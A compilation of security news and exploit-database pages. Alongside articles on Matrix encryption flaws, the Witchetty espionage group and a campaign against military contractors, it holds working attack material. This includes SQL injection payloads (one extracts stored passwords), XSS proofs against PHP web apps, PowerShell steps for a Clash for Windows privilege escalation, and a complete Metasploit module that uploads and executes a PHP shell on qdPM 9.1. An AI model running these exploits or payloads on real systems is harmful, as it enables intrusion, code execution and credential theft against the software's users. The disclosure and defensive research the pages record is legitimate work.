hms-staff.php in Projectworlds Hospital Management System Mini-Project through 2018-06-17 allows SQL injection via the type parameter.

Hi

I found a SQL injection vulnerability in your hospital management system.

**Page Request:-**

    POST /hospital/hms-staff.php HTTP/1.1
    Host: 192.168.0.107
    Content-Length: 43
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Cookie: PHPSESSID=t8e8smm8d836b7lar1qb6l3avf
    Connection: close
    
    email=username&password=password&type=admin+WHERE+1=1+AND+SLEEP(10)--+-
    

**The above query will only sleep the database for 10 seconds. Since it's a blind boolean-based injection, an attacker can dump all the databases using the substr()method or using the SQLMAP  tool.**

**Affect URL: http://127.0.0.1/hms-staff.php****Afftect Parameter:  type****Payload: admin+WHERE+1=1+AND+SLEEP(10)--+-****Mitigation:**

*   Performing Whitelist Input Validation
*   Use of Prepared Statements (with Parameterized Queries)

CVE-2022-33880: Vulnerability/BUG - Unauthenticated bind boolean based sql injection via type parameter on hms-staff.php page · Issue #7 · projectworldsofficial/hospital-management-system-in-php

The messenger protocol had gained popularity for its robust security, but vulnerabilities allowed attackers to decrypt messages and impersonate users.

Developers of the open source Matrix messenger protocol have released an update to fix critical end-to-end encryption vulnerabilities that subvert the confidentiality and authentication guarantees that have been key to the platform’s meteoric rise.

Matrix is a sprawling ecosystem of open source and proprietary chat and collaboration clients and servers that are fully interoperable. The best-known app in this family is Element, a chat client for Windows, macOS, iOS, and Android, but there’s a dizzying array of other members as well.

Matrix roughly aims to do for real-time communication what the SMTP standard does for email, which is to provide a federated protocol allowing user clients connected to different servers to exchange messages with each other. Unlike SMTP, however, Matrix offers robust end-to-end encryption, or E2EE, designed to ensure that messages can’t be spoofed and that only the senders and receivers of messages can read the contents.

Matthew Hodgson—the cofounder and project lead for Matrix and the CEO and CTO at Element, maker of the flagship Element app—said in an email that conservative estimates are that there are about 69 million Matrix accounts spread throughout some 100,000 servers. The company currently sees about 2.5 million monthly active users using its Matrix.org server, though he said this is also likely an underestimate. Among the hundreds of organizations announcing plans to build internal messaging systems based on Matrix are Mozilla, KDE, and the governments of France and Germany.

On Wednesday, a team published research that reports a host of vulnerabilities that undermine Matrix’s authentication and confidentiality guarantees. All of the attacks described by the researchers require the aid of a malicious or compromised homeserver that targets the users who connect to it. In some cases, there are ways for experienced users to detect that an attack is underway.

The researchers privately reported the vulnerabilities to Matrix earlier this year and agreed to a coordinated disclosure timed to Wednesday’s release by Matrix of updates that address the most serious flaws.

“Our attacks allow a malicious server operator or someone who gains control of a Matrix server to read the messages of users and to impersonate them to each other,” the researchers wrote in an email. “Matrix aims to protect against such behavior by providing end-to-end encryption, but our attacks highlight flaws in its protocol design and its flagship client implementation Element.”

Hodgson said he disagrees with the researchers’ contention that some of the vulnerabilities reside in the Matrix protocol itself and asserts they are all implementation bugs in the first generation of Matrix apps, which include Element. He said that a newer generation of Matrix apps, including ElementX, Hydrogen, and Third Room, are unaffected. There are no indications that the vulnerabilities have ever been actively exploited, he added.

Breaking Confidentiality, Attacking Verification, and More

The first two attacks provide a simple confidentiality break by exploiting the homeserver’s control over the users and devices that are permitted to join a private room. Only a person who creates a room or is deputized by the room creator is permitted to invite and admit new members, but the room management messages that make this mechanism possible aren’t required to be authenticated with the cryptographic keys of these authorized users. It’s trivial for someone with control of the homeserver to spoof such messages and, from there, admit users without the permission of the authorized users. Once admitted, the attacker gains access to decrypted communications sent in that room.

The researchers are careful to note that all new room entrants are automatically logged in an event timeline and hence can be detected by anyone in the room who manually inspects the membership list in real time. In large rooms with lots of activity, however, this kind of inspection may not be practical, the researchers said.

A variation of this attack is for the homeserver to add a device under the attacker’s control to the account of a user already in a private room. In a case like this, the new device will be displayed and labeled as “unverified” to all users, but at that point, all existing devices will automatically share the keys needed to decrypt all future messages.

A third proof-of-concept exploit provides an attack on the out-of-band mechanism Element offers so users can verify that the cryptographic identity they’re communicating with matches the person they think it does. This verification allows users or devices to compare short authentication strings to make sure they match, in much the way that the Signal messenger uses safety numbers. In either case, users perform the comparison outside of the app.

The researchers wrote:

_Our attack against out-of-band verification in Matrix enables an attacker to convince a target to cryptographically sign (and thus verify) a cross-signing identity controlled by the attacker. In this attack, a malicious homeserver assigns each device a device identifier that is also a valid cryptographic identity (under the homeserver’s control). At the end of the out-of-band verification process, each device will send a homeserver-controlled cryptographic identity to the other device. They do this by assigning the target device a device identifier that is also a cryptographic identity, exploiting a lack of domain separation between the two. When a device receives such a message, it is interpreted as a cryptographic identity. The receiving device will then sign (and thus verify) a homeserver-controlled cryptographic identity, with the false understanding that they have verified this identity out-of-band!_

With that, the attacker can perform a mallory-in-the-middle attack that breaks the confidentiality and authenticity of an underlying “Olm” channel, which under the Matrix design is the protocol for transmitting end-to-end data sent between two chat partners.

A fourth attack provides for what the researchers call “semi-trusted impersonation.” At times—such as when a user adds a new device to their account—a Matrix device may not have access to inbound messages in so-called Megolm sessions, as they’re known in the Matrix specification. This can prevent the device from being able to decrypt messages sent before it was added. The device can recover by using a key request to obtain the needed decryption keys.

Matrix, the researchers said, doesn’t provide a cryptographic mechanism for ensuring that the keys shared through the key request are legitimate. Instead, the Matrix specification requires sharing of inbound messages to be completed only between devices that trust each other. When this occurs, Matrix generates a warning message to messages that were decrypted using a forwarded key.

The researchers continued:

_Whilst Element clients restrict who they share keys with, no verification is implemented on who to accept key shares from. Our attack exploits this lack of verification in order to send attacker-controlled Megolm sessions to a target device, claiming they belong to a session of the device they wish to impersonate. The attacker can then send messages to the target device using these sessions, which will authenticate the messages as coming from the device being impersonated. Whilst these messages will be accompanied by a warning, this is the same warning that accompanies keys \*honestly\* forwarded with the “Key Request protocol.”_

The fifth and sixth attacks are what the researchers call trusted impersonation and impersonation to confidentiality break. Each builds off the other to enable a server to impersonate users and read their messages. A seventh attack works against a backup feature and is only of theoretical interest because the researchers can’t instantiate an attack exploiting it against a real Matrix server.

Agreeing to Disagree

In his email, Hodgson said Matrix regards only three of the vulnerabilities—the trusted impersonation, the attack on key verification, and the malicious backup attack—as critical security issues. And even then, he said all three are flaws in how Matrix was implemented in its first-generation client software developer kit, known as matrix-js-sdk. He added:

_They have highlighted two issues with the protocol which are much lower severity: that homeservers can currently add malicious users and devices to conversations that they are hosting, and that homeservers can fake history which users did not directly receive at the time. However, users are clearly warned when these situations occur: if you have verified the users in a conversation and an unverified user or device is added to a conversation, it is very clearly marked in all Matrix clients with a big red warning cross. Similarly, if an unexpected user suddenly appears in a conversation, everyone in the room is immediately informed that this user has joined, and can take appropriate evasive action._

_By confusing the legitimate implementation bugs which only affect matrix-js-sdk and derivatives with these lower severity protocol design considerations, the researchers have artificially inflated the overall severity of the problem, by falsely implying that the protocol itself is vulnerable._

_This said, we are also addressing these protocol design issues—we’ve already eliminated most situations where the server could fake history in tomorrow’s release, and we’ll be following up with an update which cryptographically ensures that users/devices can only be added to a room if they were invited by an admin in the room. We are also shifting to “trust on first use,” so that any unexpected devices/users get flagged, whether or not you’ve verified the users in a room._

Besides disagreeing on some of the specific vulnerabilities, the researchers and Hodgson remain at odds on another point. The researchers said the vulnerabilities they uncovered “highlight a lack of a unified and formal approach to security guarantees in Matrix” and that the specification has grown “organically with new sub-protocols adding new functionalities and thus inadvertently subverting the security guarantees of the core protocol.”

For his part, Hodgson said:

_We consider the protocol itself to be sound, and we consider our security processes to be robust. We agree that the first generation implementations have grown organically (they predated the formal protocol specification), and the fact is that we have been focusing our efforts on auditing our next generation implementations which we will be switching over to in the coming months. We have 4 independent public audits booked in with Least Authority, one of which is already published:_ _https://matrix.org/blog/2022/05/16/independent-public-audit-of-vodozemac-a-native-rust-reference-implementation-of-matrix-end-to-end-encryption__, and it’s worth reiterating that the next gen implementations were not susceptable\[sic\] to these attacks. It’s obviously unfortunate that we didn’t catch the first gen SDK vulns in an existing audit (the bugs occurred since our original 2016 NCC Group audit), but going forwards our reference implementations will all be independently verified. Unfortunately we didn’t have resources to audit both the legacy and next-gen implementations recently, and so focused on the next-gen \[implementations\], knowing they will shortly obsolete the legacy \[implementations\]._

The research paper, _Practically-exploitable Cryptographic Vulnerabilities in Matrix_, was authored by Martin R. Albrecht, Sofía Celi, Benjamin Dowling, and Daniel Jones. Albrecht and Jones are with the Information Security Group at the Royal Holloway University of London; Celi is with Brave Software; and Dowling is with the Security of Advanced Systems Group, University of Sheffield.

Putting It All Together

The researchers and Hodgson disagree on some key points, but there’s an important consensus that has led to changes that once again restore the confidentiality and authentication guarantees of Matrix, even in the case of a malicious or compromised homeserver. But for users to avail themselves of these assurances, the researchers said:

_Each user must enable “cross-signing” and perform out-of-band verification with each of their own devices, and with each user they interact with. They must then remain vigilant: any warning messages or icons must be spotted and investigated. In the Element user interface, this requires checking the room icon and each individual message they receive (in some cases, past messages can retroactively receive a warning). Note that such warnings could be expected behavior (for example if the message was decrypted using a server-side Megolm backup or through the “Key Request protocol”). Users would need the expertise to investigate these warnings thoroughly and, if an issue is found, recover from it. If you follow these instructions without fail, Matrix can provide you with confidentiality and authentication._

_This places an unnecessary burden on users of Matrix clients, limits the user base to those with an understanding of the cryptography used in Matrix and how it is applied, and is impractical for daily use. The burden this places on users is unnecessary and the result of the design flaws we highlight in our paper (this is our “Simple confidentiality break”/“Homeserver Control of Room Membership” attack). Whilst this issue will persist after today’s fixes, a remediation is planned by the Matrix developers for a later date. It is understandable that they have delayed the release of this remediation, since it requires sizable changes to the protocol._

Besides updating Element, people will also want to install patches for Beeper, Cinny, SchildiChat, Circuli, Synod.im, and any other clients based on matrix-js-sdk, matrix-ios-sdk, or matrix-android-sdk2. It’s important to install the fixes first and only then perform the verification with new devices.

_This story originally appeared on_ _Ars Technica__._

_Update 9-29-22, 4:30 pm ET: Updated to clarify that the patch has already been released._

A Matrix Update Patches Serious End-to-End Encryption Flaws

A remote code execution vulnerability exists in qdPM versions 9.1 and below. An attacker can upload a malicious PHP code file via the profile photo functionality by leveraging a path traversal vulnerability in the users['photop_preview'] delete photo feature thus allowing bypass of .htaccess protection. NOTE: this issue exists because of an incomplete fix for CVE-2015-3884.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::EXE  include Msf::Exploit::PhpEXE  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'qdPM 9.1 Authenticated Arbitrary PHP File Upload (RCE)',        'Description' => %q{          A remote code execution (RCE) vulnerability exists in qdPM 9.1 and earlier.          An attacker can upload a malicious PHP code file via the profile photo functionality, by leveraging a path traversal          vulnerability in the users['photop_preview'] delete photo feature, allowing bypass of .htaccess protection.          NOTE: this issue exists because of an incomplete fix for CVE-2015-3884.        },        'License' => MSF_LICENSE,        'Author' => [          'Rishal Dwivedi (Loginsoft)', # Discovery          'Leon Trappett (thepcn3rd)', # PoC          'Giacomo Casoni' # Metasploit        ],        'References' => [          ['CVE', '2020-7246'],          ['EDB', '50175']        ],        'Payload' => {          'BadChars' => "\x00"        },        'DefaultOptions' => {          'EXITFUNC' => 'thread'        },        'Platform' => %w[linux php],        'Targets' => [          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],          [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ],          [ 'Windows x86', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ],          [ 'Windows x64', { 'Arch' => ARCH_X64, 'Platform' => 'win' } ]        ],        'Privileged' => true,        'DisclosureDate' => '2020-11-21',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => ['CRASH_SAFE'],          'Reliability' => ['IOC_IN_LOGS'],          'SideEffects' => ['REPEATABLE_SESSION']        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'The base directory where qdPM resides', '/']),        OptString.new('EMAIL', [true, 'The email to login with']),        OptString.new('PASSWORD', [true, 'The password to login with'])      ]    )    self.needs_cleanup = true  end  def check    uri = normalize_uri(uri, '/index.php')    res = send_request_raw({ 'uri' => uri })    if res.nil?      return Exploit::CheckCode::Unknown    end    login_page = res.get_html_document    begin      version_num = login_page.at('div[@class="copyright"]').at('a').text.tr('qdPM ', '').to_f    rescue StandardError      return Exploit::CheckCode::Unknown    end    version = Rex::Version.new(version_num)    if version <= Rex::Version.new('9.1')      return Exploit::CheckCode::Appears    else      return Exploit::CheckCode::Safe    end  end  def get_write_exec_payload_win(fname, _data)    p = Rex::Text.encode_base64(generate_payload_exe)    php = %|    <?php    $f = fopen("#{fname}", "wb");    fwrite($f, base64_decode("#{p}"));    fclose($f);    exec("C:\\Windows\\System32\\cmd.exe /c #{fname}");    ?>    |    php = php.gsub(/^ {4}/, '').gsub(/\n/, ' ')    return php  end  def login(base, username, password)    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri("#{base}/index.php/login"),      'keep_cookies' => true    })    login_page = res.get_html_document    csrf_token = login_page.at("input[name='login[_csrf_token]']/@value")    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri("#{base}/index.php/login"),      'vars_post' => {        'login[email]' => username,        'login[password]' => password,        'login[_csrf_token]' => csrf_token      },      'keep_cookies' => true,      'headers' => {        'Origin' => "http://#{rhost}",        'Referer' => "http://#{rhost}/#{base}/index.php/login"      }    })    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri("#{base}/index.php/myAccount"),      'keep_cookies' => true,      'headers' => {        'Host' => rhost.to_s      }    })    account_page = res.get_html_document    begin      userid = account_page.at("input[@name='users[id]']/@value").text.strip    rescue StandardError      print_error('The designated admin account does not have a user ID.')      return {}    end    username = account_page.at("input[@name='users[name]']/@value").text.strip    csrftoken_ = account_page.at("input[@name='users[_csrf_token]']/@value").text.strip    opts = {      'user_id' => userid,      'name' => username,      'csrf_token' => csrftoken_    }    return opts  end  def upload_php(base, opts)    fname = opts['filename']    php_payload = opts['data']    user_id = opts['user_id']    email = opts['email']    csrf_token = opts['csrf_token']    data = [      { 'name' => 'sf_method', 'data' => 'put' },      { 'name' => 'users[id]', 'data' => user_id },      { 'name' => 'users[photo_preview]', 'data' => '.htaccess' },      { 'name' => 'users[_csrf_token]', 'data' => csrf_token },      { 'name' => 'users[new_password]', 'data' => '' },      { 'name' => 'users[email]', 'data' => email },      { 'name' => 'extra_fields[9]', 'data' => '' },      { 'name' => 'users[remove_photo]', 'data' => '1' }    ]    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri("#{base}/index.php/myAccount/update"),      'vars_form_data' => data,      'keep_cookies' => true,      'headers' => {        'Origin' => "http://#{rhost}",        'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"      }    )    data = [      { 'name' => 'sf_method', 'data' => 'put' },      { 'name' => 'users[id]', 'data' => user_id },      { 'name' => 'users[photo_preview]', 'data' => '../.htaccess' },      { 'name' => 'users[_csrf_token]', 'data' => csrf_token },      { 'name' => 'users[new_password]', 'data' => '' },      { 'name' => 'users[email]', 'data' => email },      { 'name' => 'extra_fields[9]', 'data' => '' },      { 'name' => 'users[remove_photo]', 'data' => '1' }    ]    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri("#{base}/index.php/myAccount/update"),      'vars_form_data' => data,      'keep_cookies' => true,      'headers' => {        'Origin' => "http://#{rhost}",        'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"      }    )    data = [      { 'name' => 'sf_method', 'data' => 'put' },      { 'name' => 'users[id]', 'data' => user_id },      { 'name' => 'users[_csrf_token]', 'data' => csrf_token },      { 'name' => 'users[new_password]', 'data' => '' },      { 'name' => 'users[email]', 'data' => email },      { 'name' => 'extra_fields[9]', 'data' => '' },      { 'name' => 'users[remove_photo]', 'data' => '1' },      { 'name' => 'users[photo]', 'data' => php_payload, 'mime_type' => 'application/octet-stream', 'filename' => fname }    ]    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri("#{base}/index.php/myAccount/update"),      'vars_form_data' => data,      'keep_cookies' => true,      'headers' => {        'Origin' => "http://#{rhost}",        'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"      }    })    return res.code == 302  end  def exec_php(base, _opts)    res = send_request_cgi({      'uri' => normalize_uri("#{base}/index.php/myAccount"),      'keep_cookies' => true    })    home_page = res.get_html_document    backdoor = home_page.at("//input[@name='users[photo_preview]']/@value").text.strip    register_file_for_cleanup(backdoor)    send_request_cgi({      'uri' => normalize_uri("#{base}/uploads/users/#{backdoor}")    })  end  def exploit    uri = normalize_uri(target_uri.path)    user = datastore['EMAIL']    pass = datastore['PASSWORD']    print_status("Attempt to login with '#{user}:#{pass}'")    opts = login(uri, user, pass)    if opts.empty?      print_error('Login unsuccessful or bad (admin) user')      return    end    php_fname = "#{Rex::Text.rand_text_alpha(5)}.php"    case target['Platform']    when 'php'      p = get_write_exec_payload    when 'linux'      p = get_write_exec_payload(unlink_self: true)    when 'win'      bin_name = "#{Rex::Text.rand_text_alpha(5)}.bin"      bin = generate_payload_exe      p = get_write_exec_payload_win(bin_name.to_s, bin)      print_warning("#{bin_name} will require manual cleanup")    end    print_status("Uploading PHP payload (#{p.length} bytes)...")    data = {      'email' => user.to_s,      'filename' => php_fname,      'data' => p    }    data = data.merge(opts)    uploader = upload_php(uri, data)    if !uploader      print_error('Unable to upload')      return    end    print_status("Executing '#{php_fname}'")    exec_php(uri, opts)  endend

qdPM 9.1 Authenticated Shell Upload

Bus Pass Management System version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Bus Pass Management System 1.0 - 'searchdata' Cross-Site Scripting (XSS)# Date: 2022-07-02# Exploit Author: Ali Alipour# Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip# Version: 1.0# Tested on: Windows 10 Pro x64 - XAMPP Server# CVE : N/A#Issue Detail:The value of the searchdata request parameter is copied into the HTML document as plain text between tags. The payload cyne7<script>alert(1)</script>yhltm was submitted in the searchdata parameter. This input was echoed unmodified in the application's response.This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.# Vulnerable page: /buspassms/download-pass.php# Vulnerable Parameter: searchdata [ POST Data ]#Request : POST /buspassms/download-pass.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=s5iomgj8g4gj5vpeeef6qfb0b3Origin: https://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: https://127.0.0.1/buspassms/download-pass.phpContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateAccept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 25searchdata=966196cyne7%3cscript%3ealert(1)%3c%2fscript%3eyhltm&search=#Response : HTTP/1.1 200 OKDate: Fri, 01 Jul 2022 00:14:25 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.8X-Powered-By: PHP/7.4.8Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 6425Connection: closeContent-Type: text/html; charset=UTF-8<!DOCTYPE html><html lang="en"><head><title>Bus Pass Management System || Pass Page</title><script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLba...[SNIP]...<h4 style="padding-bottom: 20px;">Result against "966196cyne7<script>alert(1)</script>yhltm" keyword </h4>...[SNIP]...

Bus Pass Management System 1.0 Cross Site Scripting

Online Examination System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Examination System - SQL Injection# Google Dork: N/A# Date: 2022-9-28# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0Vulnerability Details======================Steps :vulnerable code in file account.php<?phpif(@$_GET['q']== 'quiz' && @$_GET['step']== 2) {$eid=@$_GET['eid'];$q=mysqli_query($con,"SELECT * FROM questions WHERE eid='$eid' AND sn='$sn' " );echo '<div class="panel" style="margin:5%">';while($row=mysqli_fetch_array($q) )?>1) Log in to the application after register new userinject payload paramter eid => eid=5589741f9ed52' union select 1,2,password,4,5 from user--

Online Examination System 1.0 SQL Injection

Online Examination System version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Online Examination System - Cross site scripting Reflected# Google Dork: N/A# Date: 2022-9-29# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0Vulnerability Details======================Steps :vulnerable code in file index.php157 <?php if(@$_GET['q7'])158 { echo'<p style="color:red;font-size:15px;">'.@$_GET['q7'];}?>http://localhost/examination/index.php?q7=%22%3E%3Cscript%3Ealert(%22yousef%22);%3C/script%3Einject payload parameter q7

Online Examination System 1.0 Cross Site Scripting

APT group Witchetty (aka LookingFrog) has exploited the ProxyShell and ProxyLogon vulnerabilities to gain initial access and deploy new custom cyber tools against government agencies and a stock exchange.

An emerging cyber-espionage threat group has been hitting targets in the Middle East and Africa with a novel backdoor dubbed "Stegmap," which uses the rarely seen steganography technique to hide malicious code in a hosted image.  

Recent attacks show the group — called Witchetty, aka LookingFrog — fortifying its tool set, adding sophisticated evasion tactics, and exploiting known Microsoft Exchange vulnerabilities ProxyShell and ProxyLogon. Researchers from Symantec Threat Hunter observed the group installing webshells on public-facing servers, stealing credentials, and then spreading laterally across networks to propagate malware, they revealed in a blog post published Sept. 29.

In attacks between February and September, Witchetty targeted the governments of two Middle Eastern countries and the stock exchange of an African nation in attacks that used the aforementioned vector, they said.

ProxyShell is comprised of three known and patched flaws — CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207 — while ProxyLogon is comprised of two, CVE-2021-26855 and CVE-2021-27065. Both have been exploited widely by threat actors since they were first revealed in August 2021 and December 2020, respectively — attacks that persist as many Exchange Servers remain unpatched.  

Witchetty's recent activity also shows that the group has added a new backdoor to its arsenal, called Stegmap, which employs steganography — a stealthy technique that stashes the payload in an image to avoid detection.

**How the Stegmap Backdoor Works**

In its recent attacks, Witchetty continued to use its existing tools, but also added Stegmap to flesh out its arsenal, the researchers said. The backdoor uses steganography to extract its payload from a bitmap image, leveraging the technique "to disguise malicious code in seemingly innocuous-looking image files," they said.

The tool uses a DLL loader to download a bitmap file that appears to be an old Microsoft Windows logo from a GitHub repository. "However, the payload is hidden within the file and is decrypted with an XOR key," the researchers said in their post.

By disguising the payload in this way, attackers can host it on a free, trusted service that is far less likely to raise a red flag than an attacker-controlled command-and-control (C2) server, they noted.

The backdoor, once downloaded, goes on to do typical backdoor things, such as removing directories; copying, moving, and deleting files; starting new processes or killing existing ones; reading, creating, or deleting registry keys, or setting key values; and stealing local files.

In addition to Stegmap**,** Witchetty also added three other custom tools — a proxy utility for connecting to command-and-control (C2), a port scanner, and a persistence utility — to its quiver, the researchers said.

**Evolving Threat Group**

Witchetty first caught the attention of researchers at ESET in April. They identified the group as one of three subgroups of TA410, a broad cyber-espionage operation with some links to the Cicada group (aka APT10) that typically targets US-based utilities as well as diplomatic organizations in the Middle East and Africa, the researchers said. The other subgroups of TA410, as tracked by ESET, are FlowingFrog and JollyFrog.

In initial activity, Witchetty used two pieces of malware — a first-stage backdoor known as X4 and a second-stage payload known as LookBack — to target governments, diplomatic missions, charities, and industrial/manufacturing organizations.

Overall, the recent attacks show the group emerging as a formidable and savvy threat that combines a knowledge of enterprise weak spots with its own custom tool development to take out "targets of interest," the Symantec researchers noted.

"Exploitation of vulnerabilities on public-facing servers provides it with a route into organizations, while custom tools paired with adept use of living-off-the-land tactics allow it to maintain a long-term, persistent presence in targeted organization," they wrote in the post.  

**Specific Attack Details Against Government Agency**

Specific details of an attack on a government agency in the Middle East reveal Witchetty maintaining persistence over the course of seven months and dipping in and out of the victim's environment to perform malicious activity at will.

The attack started on Feb. 27, when the group exploited the ProxyShell vulnerability to dump the memory of the Local Security Authority Subsystem Service (LSASS) process — which in Windows is responsible for enforcing the security policy on the system — and then continued from there.

Over the course of the next six months the group continued to dump processes; moved laterally across the network; exploited both ProxyShell and ProxyLogon to install webshells; installed the LookBack backdoor; executed a PowerShell script that could output the last login accounts on a particular server; and attempted to execute malicious code from C2 servers.

The last activity of the attack that researchers observed occurred on Sept. 1, when Witchetty downloaded remote files; decompressed a zip file with a deployment tool; and executed remote PowerShell scripts as well as its custom proxy tool to contact its C2 servers, they said.

Espionage Group Wields Steganographic Backdoor Against Govs, Stock Exchange

FeehiCMS v2.1.1 was discovered to contain a cross-site scripting (XSS) vulnerability via a crafted payload injected into the Comment box under the Single Page module.

There is a stored XSS vulnerability in the background of FeehiCMS.

First register a user for testing, then go to Content -> Single Page, upload any picture in the comment box.  

Then send a comment, capture the odd packet while sending the Forward, change the value of SRC under the

tag in the packet to: 'x' \[onerror='alert(1)', and send the message.  

Refresh the page, and pop-up windows will appear on the current page and the home page.

CVE-2022-40408: There are some XSS vulnerabilities in FeehiCMS-2.1.1 · Issue #3 · liufee/feehicms

A misconfiguration in the Service Mode profile directory of Clash for Windows v0.19.9 allows attackers to escalate privileges and execute arbitrary commands when Service Mode is activated.

经 #3405 (comment) 提醒，确实有了个新思路，只要在安装 service 前执行就有可能实现：

**1\. 准备工作**

预先准备两个目录

    C:\Users\AKAVM> new-item "$home\clash-placeholder", "$home\clash-hijack", "$home\clash-hijack\service" -type directory
    
        Directory: C:\Users\AKAVM
    
    Mode                 LastWriteTime         Length Name
    ----                 -------------         ------ ----
    d-----          9/9/2022   8:18 PM                clash-placeholder
    d-----          9/9/2022   8:18 PM                clash-hijack
    
        Directory: C:\Users\AKAVM\clash-hijack
    
    Mode                 LastWriteTime         Length Name
    ----                 -------------         ------ ----
    d-----          9/9/2022   8:18 PM                service
    

往clash-hijack\service里面塞点东西，这里我选了个 rufus 便携版  

**2\. 使用 junction point 占用 clash config 目录**

这步需要保证 clash config 目录没有被占用，时机有很多先按下不表

    C:\Users\AKAVM> get-childitem "$home\.config\clash" -exclude "service" | copy-item -destination "$home\clash-placeholder" 
    C:\Users\AKAVM> remove-item "$home\.config\clash" -force -recurse -erroraction silentlycontinue
    C:\Users\AKAVM> new-item -type junction "$home\.config\clash" -target "$home\clash-placeholder"
    
        Directory: C:\Users\AKAVM\.config
    
    Mode                 LastWriteTime         Length Name
    ----                 -------------         ------ ----
    d----l          9/9/2022   7:09 PM                clash
    

**3\. 通过 cfw 安装 service**

  
此时 service 已经正常工作

**4\. service 安装完成后转移文件并重新挂载准备好的 hijack 目录**

    C:\Users\AKAVM> remove-item "$home\.config\clash" -force -recurse
    C:\Users\AKAVM> get-childitem "$home\clash-placeholder" -exclude "service" | copy-item -destination "$home\clash-hijack" 
    C:\Users\AKAVM> get-childitem "$home\clash-placeholder\service" -exclude "clash-core-service.exe" | copy-item -destination "$home\clash-hijack\service" 
    C:\Users\AKAVM> new-item -type junction "$home\.config\clash" -target "$home\clash-hijack"
    
        Directory: C:\Users\AKAVM\.config
    
    
    Mode                 LastWriteTime         Length Name
    ----                 -------------         ------ ----
    d----l          9/9/2022   7:21 PM                clash
    

到这步为止已经成功劫持该目录，并且安装 service 后 cfw 全程处于开启状态  

**5\. 最后重启验证效果**

  
可以看到 rufus 已经跳过 uac 授权直接启动，以上过程仅 cfw 在安装 service 时申请过特殊权限

而使用program files目录可以避免这个问题

    C:\Users\AKAVM> new-item -type junction "C:\Program Files\Common Files\clash" -target "$home\clash-placeholder"
    new-item : Access to the path 'clash' is denied.

CVE-2022-40126: [Bug]: Clash For Windows 最新版存在本地权限提升漏洞/Clash For Windows latest version has LPE vulnerability · Issue #3405 · Fndroid/clash_for_windows_pkg

A new covert attack campaign singled out multiple military and weapons contractor companies with spear-phishing emails to trigger a multi-stage infection process designed to deploy an unknown payload on compromised machines.
The highly-targeted intrusions, dubbed STEEP#MAVERICK by Securonix, also targeted a strategic supplier to the F-35 Lightning II fighter aircraft.
"The attack was carried out

A new covert attack campaign singled out multiple military and weapons contractor companies with spear-phishing emails to trigger a multi-stage infection process designed to deploy an unknown payload on compromised machines.

The highly-targeted intrusions, dubbed **STEEP#MAVERICK** by Securonix, also targeted a strategic supplier to the F-35 Lightning II fighter aircraft.

"The attack was carried out starting in late summer 2022 targeting at least two high-profile military contractor companies," Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in an analysis.

Infection chains begin with a phishing mail with a ZIP archive attachment containing a shortcut file that claims to be a PDF document about "Company & Benefits," which is then used to retrieve a stager -- an initial binary that's used to download the desired malware -- from a remote server.

This PowerShell stager sets the stage for a "robust chain of stagers" that progresses through seven more steps, when the final PowerShell script executes a remote payload "header.png" hosted on a server named "terma\[.\]app."

"While we were able to download and analyze the header.png file, we were not able to decode it as we believe the campaign was completed and our theory is that the file was replaced in order to prevent further analysis," the researchers explained.

"Our attempts to decode the payload would only produce garbage data."

